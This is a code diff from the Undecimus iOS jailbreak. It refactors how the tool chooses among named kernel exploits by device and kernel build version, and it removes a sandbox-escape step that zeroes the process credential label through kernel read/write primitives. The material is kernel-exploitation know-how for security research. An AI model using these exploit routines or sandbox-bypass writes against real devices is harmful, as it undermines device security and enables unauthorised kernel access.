-bool extractDebs(NSArray <NSString *> *debPaths) {
+bool extractDebs(NSArray <NSString *> *debPaths, bool doInject) {
     if ([debPaths count] < 1) {
         LOG("%s: Nothing to install", __FUNCTION__);
         return false;
     }
     for (NSString *debPath in debPaths) {
-        if (!extractDeb(debPath))
+        if (!extractDeb(debPath, doInject))
             return NO;
     }
     return YES;
@@ -782,150 +925,171 @@ NSString *getKernelBuildVersion() {
     return kernelBuild;
 }
 
-bool supportsExploit(exploit_t exploit) {
-#ifdef CAN_HAS_UNSUPPORTED_EXPLOIT
+bool checkDeviceSupport(device_support_info_t device_support) {
+#ifdef CAN_HAS_UNSUPPORTED_DEVICE
     return true;
-#else /* !CAN_HAS_UNSUPPORTED_EXPLOIT */
-    
-    NSString *minKernelBuildVersion = nil;
-    NSString *maxKernelBuildVersion = nil;
-    
-    switch (exploit) {
-        case multi_path_exploit: {
-            if (!multi_path_tcp_enabled()) {
-                return false;
-            }
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.52.2~8";
-            break;
-        }
-        case voucher_swap_exploit: {
-            if (get_kernel_page_size() != 0x4000) {
-                return false;
-            }
-            if (machineNameContains("iPad5,") &&
-                kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
-                return false;
-            }
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.240.8~8";
-            break;
-        }
-        case mach_swap_exploit: {
-            if (get_kernel_page_size() != 0x1000 &&
-                !machineNameContains("iPad5,") &&
-                !machineNameContains("iPhone8,") &&
-                !machineNameContains("iPad6,")) {
-                return false;
-            }
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.240.8~8";
-            break;
-        }
-        case mach_swap_2_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.240.8~8";
-            break;
-        }
-        case deja_xnu_exploit: {
-            if (jailbreakEnabled())
-                return false;
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.70.24~9";
-            break;
-        }
-        case empty_list_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.60.19~25";
-            break;
-        }
-        case async_wake_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.20.62~4";
-            break;
-        }
-        case necp_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.70.24~9";
-            break;
-        }
-        case kalloc_crash: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.252.2~2";
-            break;
-        }
-        default:
-            return false;
-            break;
-    }
-    
-    if (minKernelBuildVersion != nil && maxKernelBuildVersion != nil) {
+#else /* !CAN_HAS_UNSUPPORTED_DEVICE */
+    if (device_support.min_kernel_version != NULL && device_support.max_kernel_version != NULL) {
         NSString *kernelBuildVersion = getKernelBuildVersion();
-        if (kernelBuildVersion != nil) {
-            if ([kernelBuildVersion compare:minKernelBuildVersion options:NSNumericSearch] != NSOrderedAscending && [kernelBuildVersion compare:maxKernelBuildVersion options:NSNumericSearch] != NSOrderedDescending) {
-                return true;
-            }
+        if (kernelBuildVersion == nil) {
+            return false;
+        }
+        if ([kernelBuildVersion compare:@(device_support.min_kernel_version) options:NSNumericSearch] == NSOrderedAscending || [kernelBuildVersion compare:@(device_support.max_kernel_version) options:NSNumericSearch] == NSOrderedDescending) {
+            return false;
         }
-    } else {
-        return true;
     }
-
-    return false;
-#endif /* !CAN_HAS_UNSUPPORTED_EXPLOIT */
+    if (device_support.handler != NULL) {
+        if (!device_support.handler()) {
+            return false;
+        }
+    }
+    return true;
+#endif /* !CAN_HAS_UNSUPPORTED_DEVICE */
 }
 
 bool jailbreakSupported() {
-    return supportsExploit(empty_list_exploit) ||
-    supportsExploit(multi_path_exploit) ||
-    supportsExploit(async_wake_exploit) ||
-    supportsExploit(voucher_swap_exploit) ||
-    supportsExploit(mach_swap_exploit) ||
-    supportsExploit(mach_swap_2_exploit);
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != jailbreak_capability) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
+}
+
+bool substitutorSupported() {
+    for (size_t i = 0; substitutor_infos[i]; i++) {
+        if (!checkDeviceSupport(substitutor_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
 }
 
 bool respringSupported() {
-    return supportsExploit(deja_xnu_exploit);
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != respring_capability) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
 }
 
 bool restartSupported() {
-    return supportsExploit(necp_exploit) ||
-    supportsExploit(voucher_swap_exploit) ||
-    supportsExploit(kalloc_crash);
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != reboot_capability) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
 }
 
 NSInteger recommendedJailbreakSupport() {
-    if (supportsExploit(mach_swap_exploit))
-        return mach_swap_exploit;
-    else if (supportsExploit(async_wake_exploit))
-        return async_wake_exploit;
-    else if (supportsExploit(voucher_swap_exploit))
-        return voucher_swap_exploit;
-    else if (supportsExploit(mach_swap_2_exploit))
-        return mach_swap_2_exploit;
-    else if (supportsExploit(multi_path_exploit))
-        return multi_path_exploit;
-    else if (supportsExploit(empty_list_exploit))
-        return empty_list_exploit;
-    else
-        return -1;
+    NSInteger exploit = -1;
+    exploit_info_t *exploit_info = NULL;
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != jailbreak_capability
+            ) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (exploit_info == NULL) {
+            exploit_info = exploit_infos[i];
+            continue;
+        }
+        if (exploit_infos[i]->exploit_reliability > exploit_info->exploit_reliability) {
+            exploit_info = exploit_infos[i];
+        }
+    }
+    if (exploit_info != NULL) {
+        exploit = (NSInteger)exploit_info->exploit;
+    }
+    return exploit;
+}
+
+NSInteger recommendedSubstitutorSupport() {
+    NSInteger substitutor = -1;
+    substitutor_info_t *substitutor_info = NULL;
+    for (size_t i = 0; substitutor_infos[i]; i++) {
+        if (!checkDeviceSupport(substitutor_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (substitutor_info == NULL) {
+            substitutor_info = substitutor_infos[i];
+            continue;
+        }
+        if (substitutor_infos[i]->substitutor_stability > substitutor_info->substitutor_stability) {
+            substitutor_info = substitutor_infos[i];
+        }
+    }
+    if (substitutor_info != NULL) {
+        substitutor = (NSInteger)substitutor_info->substitutor;
+    }
+    return substitutor;
 }
 
 NSInteger recommendedRestartSupport() {
-    if (supportsExploit(necp_exploit))
-        return necp_exploit;
-    else if (supportsExploit(voucher_swap_exploit))
-        return voucher_swap_exploit;
-    else if (supportsExploit(kalloc_crash))
-        return kalloc_crash;
-    else
-        return -1;
+    NSInteger exploit = -1;
+    exploit_info_t *exploit_info = NULL;
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != reboot_capability
+            ) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (exploit_info == NULL) {
+            exploit_info = exploit_infos[i];
+            continue;
+        }
+        if (exploit_infos[i]->exploit_reliability > exploit_info->exploit_reliability) {
+            exploit_info = exploit_infos[i];
+        }
+    }
+    if (exploit_info != NULL) {
+        exploit = (NSInteger)exploit_info->exploit;
+    }
+    return exploit;
 }
 
 NSInteger recommendedRespringSupport() {
-    if (supportsExploit(deja_xnu_exploit))
-        return deja_xnu_exploit;
-    else
-        return -1;
+    NSInteger exploit = -1;
+    exploit_info_t *exploit_info = NULL;
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != respring_capability
+            ) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (exploit_info == NULL) {
+            exploit_info = exploit_infos[i];
+            continue;
+        }
+        if (exploit_infos[i]->exploit_reliability > exploit_info->exploit_reliability) {
+            exploit_info = exploit_infos[i];
+        }
+    }
+    if (exploit_info != NULL) {
+        exploit = (NSInteger)exploit_info->exploit;
+    }
+    return exploit;
 }
 
 bool daemonIsLoaded(char *daemonID) {
@@ -1353,6 +1517,32 @@ bool cydiaIsInstalled() {
     return true;
 }
 
+NSString *localize(NSString *str, ...) {
+    va_list ap;
+    va_start(ap, str);
+    NSString *str_to_localize = [[NSString alloc] initWithFormat:str arguments:ap];
+    va_end(ap);
+    return NSLocalizedString(str_to_localize, @"");
+}
+
+exploit_info_t *get_exploit_info(exploit_t exploit) {
+    for (size_t i = 0; exploit_infos[i]; ++i) {
+        if (exploit_infos[i]->exploit == exploit) {
+            return exploit_infos[i];
+        }
+    }
+    return NULL;
+}
+
+substitutor_info_t *get_substitutor_info(substitutor_t substitutor) {
+    for (size_t i = 0; substitutor_infos[i]; ++i) {
+        if (substitutor_infos[i]->substitutor == substitutor) {
+            return substitutor_infos[i];
+        }
+    }
+    return NULL;
+}
+
 __attribute__((constructor))
 static void ctor() {
     toInjectToTrustCache = [NSMutableArray new];

Undecimus/source/voucher_swap.c

@@ -1142,12 +1142,9 @@ voucher_swap() {
 	SafeFreeNULL(pipe_buffer);
 	mach_port_destroy(mach_task_self(), base_port);
     
-    // 30. Unsandbox
+    // 30. Cache our proc_t address
     extern uint64_t cached_proc_struct_addr;
-    uint64_t selfproc = cached_proc_struct_addr = kernel_read64(current_task + OFFSET(task, bsd_info));
-    uint64_t ucred = kernel_read64(selfproc + OFFSET(proc, p_ucred));
-    uint64_t cr_label = kernel_read64(ucred + 0x78);
-    kernel_write64(cr_label + 0x10, 0);
+    cached_proc_struct_addr = kernel_read64(current_task + OFFSET(task, bsd_info));
 
 	// And that's it! Enjoy kernel read/write via kernel_task_port.
 	INFO("done! port 0x%x is tfp0", kernel_task_port);

Update.txt

@@ -1 +1 @@
-2.1.1
+3.2.0